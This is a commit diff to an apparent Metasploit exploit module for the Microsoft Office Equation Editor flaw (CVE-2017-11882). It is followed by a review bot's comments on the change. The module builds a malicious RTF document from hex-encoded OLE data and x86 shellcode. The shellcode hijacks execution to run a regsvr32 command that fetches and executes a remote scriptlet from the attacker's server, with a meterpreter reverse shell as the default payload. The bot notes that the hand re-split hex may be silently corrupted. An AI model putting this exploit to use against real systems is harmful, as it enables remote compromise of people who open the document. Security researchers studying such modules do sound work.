
Commit cb7f173

author
Austin
authored
Update office_ms17_11882.rb
1 parent 960893b commit cb7f173


1 file changed

+103
-57
lines changed


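--- a/modules/exploits/windows/fileformat/office_ms17_11882.rb
+++ b/modules/exploits/windows/fileformat/office_ms17_11882.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
 include Msf::Exploit::Remote::HttpServer
 include Msf::Exploit::Powershell
 include Msf::Exploit::EXE
+include Msf::Exploit::FILEFORMAT
 
 
 def initialize(info = {})
@@ -38,6 +39,7 @@ def initialize(info = {})
 'Payload' => {
 'DisableNops' => true
 },
+'Stance' => Msf::Exploit::Stance::Aggressive,
 'DefaultOptions' => {
 'EXITFUNC' => 'thread',
 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
@@ -55,54 +57,107 @@ def generate_rtf
 header = '{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}' + "\n"
 header << '{\*\generator Riched20 6.3.9600}\viewkind4\uc1' + "\n"
 header << '\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata '
-header << '01050000020000000b0000004571756174696f6e2e33000000000000000000000c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'
-header << '0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff04000000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400720079000000000000000000000000000000000000000000000000000000'
-header << '00000000000000000000000000000000000016000500ffffffffffffffff0200000002ce020000000000c0000000000000460000000000000000000000008020ce'
-header << 'a5613cd30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000'
-header << '000000000000000000000000000000000a000201ffffffffffffffffffffffff000000000000000000000000000000000000000000000000000000000000000000'
-header << '000000000000001400000000000000010043006f006d0070004f0062006a0000000000000000000000000000000000000000000000000000000000000000000000'
-header << '0000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000'
-header << '0001000000660000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000'
-header << '00000000000000000000000000000012000201ffffffff04000000ffffffff00000000000000000000000000000000000000000000000000000000000000000003'
-header << '0000000600000000000000feffffff02000000fefffffffeffffff050000000600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
-header << 'ffffff0100000208000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
-header << '00000100feff030a0000ffffffff02ce020000000000c000000000000046170000004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'
-header << '71756174696f6e000b0000004571756174696f6e2e3300f439b2710000000000000000000000000000000000000000000000000000000000000000000000000000'
-header << "00000300040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\n"
+header << '01050000020000000b0000004571756174696f6e2e33000000000000000000000'
+header << 'c0000d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff'
+header << '09000600000000000000000000000100000001000000000000000010000002000'
+header << '00001000000feffffff0000000000000000ffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffdffffff040'
+header << '00000fefffffffefffffffeffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'ffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e0'
+header << '07400720079000000000000000000000000000000000000000000000000000000'
+header << '00000000000000000000000000000000000016000500ffffffffffffffff02000'
+header << '00002ce020000000000c0000000000000460000000000000000000000008020ce'
+header << 'a5613cd30103000000000200000000000001004f006c006500000000000000000'
+header << '00000000000000000000000000000000000000000000000000000000000000000'
+header << '000000000000000000000000000000000a000201ffffffffffffffffffffffff0'
+header << '00000000000000000000000000000000000000000000000000000000000000000'
+header << '000000000000001400000000000000010043006f006d0070004f0062006a00000'
+header << '00000000000000000000000000000000000000000000000000000000000000000'
+header << '0000000000000000000000000000120002010100000003000000ffffffff00000'
+header << '00000000000000000000000000000000000000000000000000000000000000000'
+header << '0001000000660000000000000003004f0062006a0049006e0066006f000000000'
+header << '00000000000000000000000000000000000000000000000000000000000000000'
+header << '00000000000000000000000012000201ffffffff04000000ffffffff000000000'
+header << '00000000000000000000000000000000000000000000000000000000000000003'
+header << '0000000600000000000000feffffff02000000fefffffffeffffff05000000060'
+header << '0000007000000feffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'
+header << 'ffffff01000002080000000000000000000000000000000000000000000000000'
+header << '00000000000000000000000000000000000000000000000000000000000000000'
+header << '00000100feff030a0000ffffffff02ce020000000000c00000000000004617000'
+header << '0004d6963726f736f6674204571756174696f6e20332e30000c00000044532045'
+header << '71756174696f6e000b0000004571756174696f6e2e3300f439b27100000000000'
+header << '00000000000000000000000000000000000000000000000000000000000000000'
+header << "00000300040000000000000000000000000000000000000000000000000000000"
+header << "000000000000000000000000000000000000000000000000000000000000000\n"
+
+
+
+shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00"
+shellcode << "\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ"
+shellcode << "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09"
+shellcode << "\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53"
+shellcode << "\x66\x83\xEE\x4C\xFF\x10\x90\x90"
 
 footer = '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
-footer << '4500710075006100740069006F006E0020004E00610074006900760065000000000000000000000000000000000000000000000000000000000000'
-footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000400'
-footer << '0000C50000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
-footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000000000000000000000000000'
-footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
-footer << '0000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'
-footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
-footer << '000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'
-footer << '0000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000D0000004D45544146494C'
-footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C500000002001C0000000000050000000902000000000500000002'
+footer << '4500710075006100740069006F006E0020004E006100740069007600650000000'
+footer << '00000000000000000000000000000000000000000000000000000'
+footer << '000000000020000200FFFFFFFFFFFFFFFFFFFFFFFF00000000000'
+footer << '00000000000000000000000000000000000000000000000000000000000000400'
+footer << '0000C5000000000000000000000000000000000000000000000000'
+footer << '0000000000000000000000000000000000000000000000000000000000000000'
+footer << '00000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF00'
+footer << '000000000000000000000000000000000000000000000000000000'
+footer << '0000000000000000000000000000000000000000000000000000000000000000'
+footer << '000000000000000000000000000000000000000000000000000000'
+footer << '0000000000000000000000000000000000000000000000000000000000FFFFFF'
+footer << 'FFFFFFFFFFFFFFFFFF000000000000000000000000000000000000'
+footer << '00000000000000000000000000000000000000000000000000000000000000000'
+footer << '00000000000000000000000000000000000000000000000000000'
+footer << '00000000000000000000000000000000000000000000000000000000000000000'
+footer << '0000000000000FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000'
+footer << '00000000000000000000000000000000000000000000000000000000000000000'
+footer << '00000000000000001050000050000000D0000004D45544146494C'
+footer << '4550494354003421000035FEFFFF9201000008003421CB010000010009000003C'
+footer << '500000002001C0000000000050000000902000000000500000002'
 footer << '0101000000050000000102FFFFFF00050000002E0118000000050000000B0200000000050000000C02A001201E1200000026060F001A00FFFFFFFF'
 footer << '000010000000C0FFFFFFC6FFFFFFE01D0000660100000B00000026060F000C004D61746854797065000020001C000000FB0280FE00000000000090'
 footer << '01000000000402001054696D6573204E657720526F6D616E00FEFFFFFF6B2C0A0700000A0000000000040000002D0100000C000000320A60019016'
@@ -123,23 +178,14 @@ def generate_rtf
 footer << "}}}\n"
 footer << '\par}' + "\n"
 
-shellcode = "\x1c\x00\x00\x00\x02\x00\x9e\xc4\xa9\x00\x00\x00\x00\x00\x00\x00\xc8\xa7\\\x00\xc4\xee[\x00\x00\x00\x00\x00\x03\x01\x01\x03\n\n\x01\x08ZZ"
-shellcode << "\xB8\x44\xEB\x71\x12\xBA\x78\x56\x34\x12\x31\xD0\x8B\x08\x8B\x09\x8B\x09\x66\x83\xC1\x3C\x31\xDB\x53\x51\xBE\x64\x3E\x72\x12\x31\xD6\xFF\x16\x53\x66\x83\xEE\x4C\xFF\x10"
-shellcode << "\x90\x90"
 
 payload = shellcode
 payload += [0x00402114].pack("V")
 payload += "\x00" * 2
 payload += "regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll"
 payload = (payload + ("\x00" * (197 - payload.length))).unpack('H*').first
 payload = header + payload + footer
-
-path = ::File.join(Msf::Config.local_directory, datastore['FILENAME'])
-::File.open(path, 'wb') do |fd|
-fd.write(payload)
-fd.close
-end
-print_good("Wrote payload to #{path}")
+payload
 end
 
 
@@ -207,6 +253,6 @@ def gen_sct_file(command)
 
 
 def primer
-generate_rtf
+file_create(generate_rtf)
 end
 end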
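Review bot: The OLE object data appended to `header` (new lines 60–131) and `footer` (141–160) has been re-split by hand into chunks of 65, 53 and 54 hex characters, i.e. at nibble rather than byte boundaries, and nothing verifies that the re-split blobs still have the original byte length, so a single dropped or duplicated character would shift every following byte of the embedded object without any error at generation time. Keeping each chunk at an even length and collecting the hex into its own local (say `objdata`, built from a `<<~HEX` heredoc with `.delete("\n")`) would make a byte-by-byte comparison against the previous version possible, and a post-condition such as `fail_with(Failure::BadConfig, 'objdata hex is not byte-aligned') if objdata.length.odd?` would turn silent corruption into a clear error. The three consecutive blank lines at 132–134 look unintended. The `def generate_rtf` line itself lies outside the hunks; while this function is being reworked, note that the unchanged padding `"\x00" * (197 - payload.length)` on line 186 goes negative for a long `get_uri`, which `String#*` rejects with an ArgumentError rather than a readable failure.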
